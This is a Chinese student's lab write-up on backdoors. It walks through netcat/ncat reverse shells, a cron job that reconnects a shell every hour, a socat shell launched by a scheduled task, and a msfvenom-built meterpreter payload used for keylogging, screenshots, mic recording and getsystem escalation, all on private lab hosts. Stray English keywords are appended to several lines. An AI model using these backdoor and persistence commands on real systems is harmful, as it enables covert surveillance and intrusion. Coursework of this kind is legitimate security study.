Exp2 後門原理與實踐 20154308張珊珊

一.基礎問題回答

1.例舉你能想到的一個後門進入到你係統中的可能方式?linux

  • 咱們在安裝經常使用應用軟件時,後門捆綁在下載的軟件上,與軟件一塊兒安裝進入了系統

2.例舉你知道的後門如何啓動起來(win及linux)的方式?git

  • windows:直接雙擊開啓後門程序、經過Windows->控制面板->管理工具啓動任務計劃程序、開機自啓動的後門、和其餘程序捆綁運行的後門程序
  • linux:設置了cron啓動,在到達規定的時間時後門啓動

3.Meterpreter有哪些給你映像深入的功能?web

  • 能夠獲取目標主機攝像頭!雖而後面的實驗中我並無成功,可是看別人的博客裏都成功了,仍是很可怕的
  • 能夠截圖,萬一一個涉密機被裝了後門程序,那祕密文件豈不是被垂手可得地泄露了
  • 其實它的每個功能都讓人感到懼怕

4.如何發現本身有系統有沒有被安裝後門?shell

  • 通常的後門程序都會被殺毒軟件查殺,好比實驗中的後門程序就被電腦管家消滅了,能被查殺的後門是否是很少了?
  • 對於厲害的後門,能夠及時監控進程是否異常,數據流異常以及開機自啓動項,看看有沒有消耗cpu特別大的進程。

二.經常使用後門工具實驗過程

2.1 Windows得到Linux Shell

1.在Win下,先使用ipconfig指令查看本機IP:172.30.6.22
vim

2.使用ncat.exe程序監聽4308端口:ncat -l -p 4308windows

3.Linux在終端窗口使用nc Win的IP 端口號 -e /bin/sh命令去鏈接Win的4308端口。
安全

4.鏈接成功後就能夠在Win的cmd窗口中輸入Linux的命令,此時已經獲取了Linux的shell。
網絡

2.2 Linux得到Win Shell

1.在Linux下使用ifconfig命令查看本地主機IP:172.30.5.236
tcp

2.在Linux使用ncat.exe程序監聽4308端口:nc -l -p 4308編輯器

3.Win在cmd窗口使用ncat.exe -e cmd.exe linux的IP 端口命令去鏈接Linux的4308端口:ncat.exe -e cmd.exe 172.30.5.236 4308

4.鏈接成功後就能夠在Linux的終端窗口中輸入Win的命令,此時已經獲取了Win的shell。

兩個步驟相似,只是執行命令的主機相反。

2.3使用nc傳輸數據

netcat根據課上所學簡單來說,就是利用tcp、udp鏈接進行基本的數據收發,在兩臺主機之間傳輸字符文件之類的,因此咱們在這裏嘗試用它在win和linux之間作一個後門。

1.Win使用ncat.exe -l 4308命令監聽本機的4308端口。

2.Linux使用nc 172.30.5.22 4308命令去鏈接Win的4308端口,其中的ip地址應爲linux的ip地址。

3.鏈接成功後便可傳輸數據,在linux終端輸入的字符能夠出如今win終端,而在win終端輸入的字符也會出如今linux終端。如上圖

4.也能夠利用以下命令將文件裏的內容做爲輸入,寫入到另外一臺主機的文件裏

nc -l 1234 > filename.out

nc host.example.com 1234 < filename.in

2.4 nc定時啓動

1.ncat.exe -l -p 4308 win運行ncat.exe監聽4308端口。(忘記截圖)

2.crontab -e Cron是Linux下的定時任務,每一分鐘運行一次,根據配置文件執行預設的指令。由於是第一次編輯,因此會提示選擇編輯器,咱們選擇3,利用最基本的vim編輯器進行編輯。
(再次忘記截圖,由於當時卡在了怎麼編輯文件,看到了某一個學姐的博客以後才知道,仍是基礎知識掌握得不牢固,很不牢固,可是會加油的)

a進入編輯狀態,在文件最後一行添加18 * * * * /bin/netcat 172.30.6.22 4308 -e /bin/sh 表示在每一個小時的第18分鐘反向鏈接win的4308端口。

添加完後:wq存盤退出,配置即生效。

3.當時間到了18分時,win已經得到了linux的shell,能夠輸入ls等指令,而在18分之前,終端裏是不會有任何反應的。

2.5 使用socat獲取主機shell

1.在Win系統下,打開控制面板->系統和安全->管理工具->任務計劃程序,建立任務,填寫任務名稱20154308

新建一個觸發器,設置以下

2.下載socat軟件,下載地址[https://gitee.com/wildlinux/NetSec/attach_files](老師的講義裏給的附件)

在操做->程序或腳本中選擇你的socat.exe文件的路徑,在添加參數一欄填寫tcp-listen:4308 exec:cmd.exe,pty,stderr

3.建立完成以後,按Windows+L快捷鍵鎖定計算機,再次打開時,能夠發現以前建立的任務已經開始運行:

4.此時,在linux終端輸入指令socat - tcp:172.30.6.22:4308,這裏的第一個參數-表明標準的輸入輸出,第二個流鏈接到Wind主機的4308端口,此時能夠發現已經成功得到了一個win shell:

2.6體驗Meterpreter的功能

1.生成後門程序msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.5.236 LPORT=4308 -f exe > 20154308_backdoor.exe

2.將生成的後門程序傳送到Win主機上ncat.exe -lv 4308 > 20154308_backdoor.exe

3.在linux上使用msfconsole指令進入msf控制檯,進行一系列以下設置

msfconsole進入msf(圖案好像會不同,可是不太清楚是啥)

use exploit/multi/handler進入handler模式

set payload windows/meterpreter/reverse_tcp設置payload

set LHOST 172.30.5.236設置LHOST

set LPORT 4308設置LPORT

show options查看當前信息狀態

exploitmsf開始監聽

4.20154308_backdoor.exe在win上打開後門程序

5.而後能夠發現linux已經得到了Win shell

6.接下來就能夠利用msf作一些有趣的事情

record_mic錄音

webcam_snap拍照(惋惜沒有成功)

screenshot截屏

使用keyscan_start指令開始記錄下擊鍵的過程,使用keyscan_dump指令讀取擊鍵的記錄:

先使用getuid指令查看當前用戶,使用getsystem指令進行提權,如圖所示,提權成功

三.實驗遇到的問題

3.1 後門程序傳送到win後,win沒法打開後門程序

  • 稍微一想就會知道確定是殺毒軟件的做用。因此打開虛擬機上的電腦管家,能夠看到咱們所生成的後門程序20154308_backdoor.exe被查殺了
  • 因此咱們選擇恢復,而後就能夠在指定文件夾裏找到這個程序了
  • 能夠正常打開後門程序了

3.2 沒法使用攝像頭進行偷拍,非常難過,檢查過設備管理器,確實是沒有攝像頭設備

  • 嘗試過在虛擬機->可移動設備->Chiconyxxxxxxxxx這裏選擇鏈接主機,然而個人虛擬機裏並無chicony這個選項可讓我鏈接主機。失敗
  • 嘗試過在物理機的計算機管理->服務裏啓用全部與虛擬機相關的服務,然而並無反應。失敗
  • 最後一個方法,我沒骨氣的選擇了放棄

四.實驗總結

  • 有趣可是很恐怖,可能我在作實驗的時候就被人監視着一切(可是好像也沒什麼人會特意去監視我哈)
  • 殺毒軟件確實仍是有一點用的,不知道在後面瞭解到免殺實驗後我還會不會這麼想
  • 此次的實驗是比較簡單?我寫完博客就能掌握一些東西了,不像上次作完實驗,其實仍是雲裏霧裏,上了實驗課以後才差很少明白一點。是我變厲害了?哈哈哈哈
  • 昨天聽一個學長說,網絡對抗這門課雖然課上聽不懂(是真的聽不懂,一節課下來不知道本身聽到了什麼),可是課下對照着實驗指導書和別人寫的博客,實際操做仍是蠻有意思的。我如今不只是以爲有意思,更以爲本身能從實際操做中掌握到一點點點點知識了,沒白學吧這個課,就是但願之後在課堂上能再聽懂多一點東西
相關文章
相關標籤/搜索